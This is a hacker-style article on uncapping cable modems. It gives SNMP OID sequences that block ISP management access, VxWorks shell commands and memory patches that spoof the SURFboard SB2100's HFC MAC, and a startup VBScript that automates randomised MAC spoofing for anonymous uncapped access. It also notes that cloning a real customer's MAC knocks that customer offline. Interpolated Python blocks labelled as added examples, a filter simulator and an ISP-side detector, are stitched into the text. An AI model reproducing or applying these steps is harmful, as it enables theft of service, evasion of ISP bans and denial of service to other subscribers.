Uncapper's Paradise

by CronoS@OlympoS

In this article, I will try to show that all is not lost on the uncapping front.  If you have a shell-enabled (firmware) cable modem (e.g., SURFboard SB2100) or think you can get one (from eBay), read on.

If you want to change your modem into an IP/LLC filtering firewall, read on.  I will tell you how to add filters, and how to change the HFC MAC address automatically to a random one and surf uncapped anonymously.

Disclaimer:  Use this knowledge to explore DOCSIS and VxWorks OS.  Do not use it for illegal purposes.

Background - A Brief History of Uncapping

I first came across broadband services in 1999.  When I heard that some company was planning to offer these services, I quickly subscribed as a beta tester.  A few days later I started uncapping with the usual TFTP spoof method (although it was so fast during the test days that there was no need to uncap, I felt like finding its strong and weak points).

Then I accessed the router and learned "cable qos permission enforce" for increasing the speed of a single modem or of all modems.  And the ISP's Cisco Network Registrar software, with its default user/pass (admin/changeme), was there to set better profiles for customers.

So when they found a way to stop it (MD5.cm file), I found another way (removing the MD5 with hexedit) to do it.  Then they replaced their uBR7200 with a 12000 router and the MD5 removal thing was history.  I sniffed the network and picked up configuration file names (512k.cm, etc.).

The fastest I found was a two-megabit file, and it had an easily guessed name (2048.cm).  It was possible to feed these files to the modem with TFTP.  Then they thought that if they changed the names to stupidly long filenames with random characters, curious explorers wouldn't find and use them.  Heh, thanks to the sniffers, it was easy to find out the names and get them from the TFTP server.

So, I started using the two-megabit file, but they kept resetting my modem.  First, I thought (like others) that if I could block SNMP access, then they wouldn't be able to reset my modem.  So I quickly wrote a Perl script to change the SNMP community string and management IP address on the modem.

Here's what you need:

OID=1.3.6.1.3.83.1.2.1.7.1 Type=INTEGER Value=5 (create filter and wait)
OID=1.3.6.1.3.83.1.2.1.2.1 Type=IPADDRESS Value=x.x.x.x (mgmt source IP address)
OID=1.3.6.1.3.83.1.2.1.3.1 Type=IPADDRESS Value=x.x.x.x (netmask)
OID=1.3.6.1.3.83.1.2.1.4.1 Type=OCTETSTRING Value=smtg (new community string here)
OID=1.3.6.1.3.83.1.2.1.5.1 Type=INTEGER Value=3 (read-write access)
OID=1.3.6.1.3.83.1.2.1.7.1 Type=INTEGER Value=1 (activate filter)

If you set these sequentially, then no one will be able to reach your modem by SNMP.  Victory again.

But after four weeks, I found my modem getting reset again.  Back to reading DOCSIS documents again.

One thing to note, it was always fun to explore this new technology and learn new things.  As I learned, BSP techies learned too, and they got better security skills.  So isn't this good for both?  Of course, the taste of fast speed was great (if you live in an animal-named country where the ISP commercial on TV says, "Look, the connection is still there, we're online for hours"  #!$%).

Next, I thought that if I could block all communication between the modem and the CMTS (router), they would not know my modem was online.  This technique still works in some cities here.  Just read the how-tos at cisco.com and create IP/LLC filters with SNMP:

From: Any
To: Your modem's HFC IP address
Action: Block

IP Filtering Example

OID=1.3.6.1.3.83.1.6.3.0 Type=INTEGER Value=2  
(If an IP packet does not match this filter, then let it pass)

OID=1.3.6.1.3.83.1.6.4.1.2.1 Type=INTEGER Value=5 
(Create the IP filter table entry number "1," but don't activate it yet)

OID=1.3.6.1.3.83.1.6.4.1.3.1 Type=INTEGER Value=1 
(All IP packets matching filter number "1" will be discarded)

OID=1.3.6.1.3.83.1.6.4.1.4.1 Type=INTEGER Value=0 
(This filter will be applied to both interfaces)

OID=1.3.6.1.3.83.1.6.4.1.5.1 Type=INTEGER Value=3 
(This filter applies to inbound and outbound traffic)

OID=1.3.6.1.3.83.1.6.4.1.6.1 Type=INTEGER Value=2 
(This filter does not only apply to broadcast and multicast traffic)

OID=1.3.6.1.3.83.1.6.4.1.7.1 Type=IPADDRESS Value="0.0.0.0"
(The source IP address for this filter - beginning IP - if range)

OID=1.3.6.1.3.83.1.6.4.1.8.1 Type=IPADDRESS Value="0.0.0.0"
(The source IP address for this filter - end IP - if range)

OID=1.3.6.1.3.83.1.6.4.1.9.1 Type=IPADDRESS Value="cm HFC IP"
(The destination IP address for this filter - low)

OID=1.3.6.1.3.83.1.6.4.1.10.1 Type=IPADDRESS Value="cm HFC IP"
(The destination IP address for this filter - high)

OID=1.3.6.1.3.83.1.6.4.1.11.1 Type=INTEGER Value=256
(This filter matches TCP packets)

OID=1.3.6.1.3.83.1.6.4.1.12.1 Type=INTEGER Value=0   
(Source port - low)

OID=1.3.6.1.3.83.1.6.4.1.13.1 Type=INTEGER Value=65535 
(Source port - high)

OID=1.3.6.1.3.83.1.6.4.1.14.1 Type=INTEGER Value=0 
(Destination port - low)

OID=1.3.6.1.3.83.1.6.4.1.15.1 Type=INTEGER Value=65535 
(Destination port - high)

OID=1.3.6.1.3.83.1.6.4.1.2.1 Type=INTEGER Value=1 
(Activate the IP filter)

LLC Filtering Example (ARP Filtering in this Example)

OID=1.3.6.1.3.83.1.6.1.0 Type=INTEGER Value=2  
(2 = drop matching, allow others - 1 = allow matching, drop others)

OID=1.3.6.1.3.83.1.6.2.1.2.1 Type=INTEGER Value=5   
(Create and wait)

OID=1.3.6.1.3.83.1.6.2.1.3.1 Type=INTEGER Value=0 
(Both interfaces)

OID=1.3.6.1.3.83.1.6.2.1.4.1 Type=INTEGER Value=1 
(Ethernet protocol)

OID=1.3.6.1.3.83.1.6.2.1.5.1 Type=INTEGER Value=2054 
(ARP traffic)

OID=1.3.6.1.3.83.1.6.2.1.2.1 Type=INTEGER Value=1 
(Activate filter)

I wrote a tool to add these rules to the modem easily, and will make it public soon.
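As an added example (not the author's tool, and not modem firmware code), here is a small Python simulator of how a modem evaluates the docsDevFilterIpTable rows set above, following the RFC 2669 DOCS-CABLE-DEVICE-MIB semantics: the address columns are address/mask pairs, protocol value 256 is the "any protocol" wildcard, control 1 discards, and docsDevFilterIpDefault decides unmatched packets.  It lets you check what a given filter set does to management traffic before committing it to a device.  The HFC IP 10.1.2.3 is a constructed stand-in for "cm HFC IP"; the ifIndex and broadcast-only columns are parsed but not evaluated.

```python
from collections import defaultdict
from ipaddress import IPv4Address
# docsDevFilterIpTable columns (RFC 2669, experimental arc 1.3.6.1.3.83) as set on this page.
IP_PREFIX, DEFAULT_OID = "1.3.6.1.3.83.1.6.4.1", "1.3.6.1.3.83.1.6.3.0"
COLS = {2: "status", 3: "control", 4: "ifindex", 5: "direction", 6: "bcast_only",
        7: "saddr", 8: "smask", 9: "daddr", 10: "dmask", 11: "proto",
        12: "sport_lo", 13: "sport_hi", 14: "dport_lo", 15: "dport_hi"}

def replay(sets):  # replay (oid, value) SNMP sets in order; the last write to a column wins
    default, rows = 2, defaultdict(dict)       # docsDevFilterIpDefault: 1 = discard, 2 = accept
    for oid, value in sets:
        if oid == DEFAULT_OID:
            default = int(value)
        elif oid.startswith(IP_PREFIX + "."):
            col, row = map(int, oid[len(IP_PREFIX) + 1:].split("."))
            rows[row][COLS[col]] = str(value)
    return default, dict(rows)

def addr_match(addr, want, mask):
    a, w, m = (int(IPv4Address(x)) for x in (addr, want, mask))
    return a & m == w & m                      # 0.0.0.0 with mask 0.0.0.0 matches any address

def matches(row, pkt):
    """pkt: dict with direction ('inbound'/'outbound'), src, dst, proto, sport, dport."""
    want_dir = {"1": "inbound", "2": "outbound"}.get(row.get("direction", "3"))  # 3 = both
    proto = int(row.get("proto", 256))                    # 256 = any IP protocol (TCP is 6)
    return (row.get("status") == "1"                      # RowStatus: only active(1) rows apply
            and want_dir in (None, pkt["direction"])
            and proto in (256, pkt["proto"])
            and addr_match(pkt["src"], row["saddr"], row["smask"])
            and addr_match(pkt["dst"], row["daddr"], row["dmask"])
            and int(row["sport_lo"]) <= pkt["sport"] <= int(row["sport_hi"])
            and int(row["dport_lo"]) <= pkt["dport"] <= int(row["dport_hi"]))

def verdict(default, rows, pkt):
    """First matching active row decides (control 1 = discard, 2 = accept); else the default."""
    for _, row in sorted(rows.items()):
        if matches(row, pkt):
            return "discard" if row["control"] == "1" else "accept"
    return "discard" if default == 1 else "accept"

# Constructed input: the page's IP filter sequence, with 10.1.2.3 standing in for "cm HFC IP".
HFC = "10.1.2.3"
PAGE_SETS = [(DEFAULT_OID, 2)] + [(f"{IP_PREFIX}.{c}.1", v) for c, v in [
    (2, 5), (3, 1), (4, 0), (5, 3), (6, 2), (7, "0.0.0.0"), (8, "0.0.0.0"),
    (9, HFC), (10, HFC), (11, 256), (12, 0), (13, 65535), (14, 0), (15, 65535), (2, 1)]]

def page_filter_verdict(pkt):  # what the page's filter does with one packet
    return verdict(*replay(PAGE_SETS), pkt)
```

An SNMP request from the CMTS to the HFC IP gets "discard" while ordinary traffic to other destinations falls through to the accept default.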

Now

As I moved to a smaller town (where the cable company had less than 100 customers), my first try was quickly detected and resulted in a "shame on you" telephone conversation.

I tried another modem I had; they banned its MAC address and it never got online again (it couldn't get an IP for the HFC MAC, and with an IP like 0.0.0.0 it couldn't bind TFTP and the other stuff).

Another modem, and it got banned too.  Well, now it's a challenge.  I should find a way.  I should have control over the modem as much as they do.  So I looked for a modem with shell-enabled firmware.  I found one (from eBay) and examined the underlying beautiful VxWorks OS.  After two days of hard work, I found several ways to change the MAC address of the modem.

The following techniques are for the SURFboard SB2100 modem with shell-enabled firmware (SB2100-1.1.1-SCM-SHELL).

Check:

http://192.168.100.1/mainhelp.html

to see if your modem has shell-enabled firmware.

First, connect the modem's diagnostic port to your PC's serial port.  (I will not go into details, consult your hardware guru friends.)

Change your PC's IP to the TFTP server's IP (I will give you a sample script to automate this below).

Start up your favorite terminal program (examples are for SecureCRT) and turn on the modem.  You will see something like:

SURFboard Cable Modem - Model SB2100
Cold boot @ 0xbfc00000 ...
Running dramTest (32 bit ) store/load basic test ... PASSED
   ..
VxWorks System Boot

If you see a "->" prompt after:

$$ MCNS STARTUP $$
Launching startup...

then you are ready to use the commands below:

-> ts tScMain 

(Suspends the start-up script; ts = taskSuspend.)
(You will not be able to catch the tScMain task if you don't enter this quickly - you need a terminal program that can run scripts, like SecureCRT.)

-> sysHfcMacAddrSet__3Hfccccccc(0x00, 0xDE, 0xAD, 0xBE, 0xEF, 0x01)

-> routeAdd "TFTPserverIP", "192.168.100.1"

(With this route in place, you won't need to ping the modem for the TFTP feed.)

-> tr tScMain

(Resumes the start-up script; tr = taskResume.)

-> td tShell 

(Deletes the shell task; td = taskDelete.  This is needed for later [privileged] shell access: it prevents the CLI from starting, so later you just hit CTRL+C and it will grant you a new [privileged] shell.)

After the modem gets the .cm file, you can revert your IP settings back to DHCP.

The first method I found was using the sysEnetMacAddrSet command.  This command is used to change the Ethernet interface's MAC address.  But:

-> l sysEnetMacAddrSet
..
0x800a6bac 34c6800a ori a2,a2,0x800a
..

-> m 0x800a6bae (enter)
-> 800a6bae: 800a - (type '8000' and hit Enter here - for HFC interface)
-> 800a6bb0: 2504 - (type '.' and hit Enter to quit modifying)

Now if we call sysEnetMacAddrSet(0x00,...) it will set the HFC interface's MAC address instead of the Ethernet one!  I will not list all commands here.  All you need is:

-> lkup "keyword"

This lists the commands/functions whose names contain the keyword - case sensitive (lkup "reset", lkup "snmp", lkup "SNMP").

With lkup you can find everything, and if you're familiar with assembly, just use:

-> l command/function

for further examination.

If you set the MAC address to an already existing MAC address, the modem will be online with the Class-of-Services set for that customer and will cause the other (real one) to reset itself. When the other (real one) gets online your modem will reset itself, and so on. This looping process may cause a Denial-of-Service attack and prevent the legitimate user from connecting to the net.
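The reset loop just described is visible from the ISP side as the same HFC MAC registering over and over, and a randomised address (0x00 followed by five random bytes, as the script further down produces) almost never lands on an OUI the operator actually provisions.  The following Python is an added example of those two checks run over CMTS-side registration records; it is not the author's code, and both the log lines and the OUI inventory are constructed for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed CMTS-side registration log for this example (not real ISP data):
# "<date> <time> <HFC MAC> REGISTRATION SUCCESS", one line per modem registration.
SAMPLE_LOG = """\
2003-01-10 09:00:05 00:10:18:aa:bb:cc REGISTRATION SUCCESS
2003-01-10 09:00:09 00:20:40:11:22:33 REGISTRATION SUCCESS
2003-01-10 09:01:30 00:10:18:aa:bb:cc REGISTRATION SUCCESS
2003-01-10 09:03:02 00:10:18:aa:bb:cc REGISTRATION SUCCESS
2003-01-10 09:04:41 00:10:18:aa:bb:cc REGISTRATION SUCCESS
2003-01-10 09:05:00 00:de:ad:be:ef:01 REGISTRATION SUCCESS
2003-01-10 09:06:12 00:20:40:11:22:33 REGISTRATION SUCCESS
"""
# Constructed inventory: OUIs (first three octets) of the modems the ISP actually provisions.
KNOWN_OUIS = {"00:10:18", "00:20:40"}

def parse_log(text):
    """Return (timestamp, mac) for each successful registration."""
    events = []
    for line in text.splitlines():
        date, clock, mac, *rest = line.split()
        if rest == ["REGISTRATION", "SUCCESS"]:
            events.append((datetime.fromisoformat(f"{date} {clock}"), mac.lower()))
    return events

def find_flapping(events, window=timedelta(minutes=10), threshold=3):
    """MACs registering `threshold` or more times within `window`: the symptom of the
    reset loop described above, where two modems share one HFC MAC and keep knocking
    each other offline. A healthy modem registers once and stays up."""
    recent, flagged = defaultdict(deque), set()
    for ts, mac in sorted(events):
        q = recent[mac]
        q.append(ts)
        while ts - q[0] > window:          # slide the window forward
            q.popleft()
        if len(q) >= threshold:
            flagged.add(mac)
    return flagged

def find_unknown_oui(events, known_ouis=KNOWN_OUIS):
    """MACs whose OUI matches nothing in the inventory: a randomised address (such as
    0x00 followed by five random bytes) is very unlikely to land on a provisioned OUI."""
    return {mac for _, mac in events if mac[:8] not in known_ouis}

def audit(text, known_ouis=KNOWN_OUIS):
    """Both checks over one log; each returns a set of MACs to look at."""
    events = parse_log(text)
    return {"flapping": find_flapping(events),
            "unknown_oui": find_unknown_oui(events, known_ouis)}
```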

Automatic for the People

Examples are for SecureCRT and Windows 2000 or Windows XP.

Add the following to Startup (create a batch file and add it to the Startup folder, or add it to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run)

C:\Program Files\SecureCrt\securecrt.exe /S sessionname /script C:\script.vbs

Copy the script below to: C:\script.vbs

# $language = "VBScript"
# $interface = "1.0"

' Variable names are Turkish: tavan = ceiling, taban = floor, rendim = random byte,
' kauntir = counter, sonuc = result (hex string), tumsi = the assembled command line.
Dim tavan,taban,rendim,kauntir
Dim sonuc
Dim tumsi

Sub setaddr
tumsi = "sysHfcMacAddrSet__3Hfccccccc(0x00"
do while kauntir<6
randomize
rendim = Int((tavan - taban + 1)*Rnd + taban)
sonuc= hex(rendim)
tumsi = tumsi + "," + "0x" + sonuc
kauntir = kauntir+1
loop
tumsi = tumsi + ")"
End Sub

Do while 1=1
crt.Screen.Synchronous = True
tavan = 255
taban = 17
kauntir = 1
setaddr()
crt.Screen.WaitForString "Version:"
Set shell = CreateObject("WScript.Shell")
' Quotes inside a VBScript string literal must be doubled ("") or the line will not parse.
shell.Run "netsh interface ip set address ""Local Area Connection"" static TFTPSERVERIPHERE 255.255.0.0 TFTPSERVERIPHERE 1"
crt.Screen.WaitForString "-> "
crt.Screen.Send "ts tScMain" & vbCr
crt.Screen.WaitForString "-> "
crt.Screen.Send tumsi & vbCr
crt.Screen.WaitForString "-> "
crt.Screen.Send "routeAdd "&Chr(34)&"TFTPSERVERIPHERE"&Chr(34)&", "&Chr(34)&"192.168.100.1"&Chr(34) & vbCr
crt.Screen.WaitForString "-> "
crt.Screen.Send "tr tScMain" & vbCr
crt.Screen.WaitForString "-> "
crt.Screen.Send "td tShell" & vbCr
crt.Screen.WaitForString "REGISTRATION SUCCESS"
shell.Run "netsh interface ip set address ""Local Area Connection"" source=dhcp"
crt.Screen.Synchronous = False
loop

Code: script.vbs
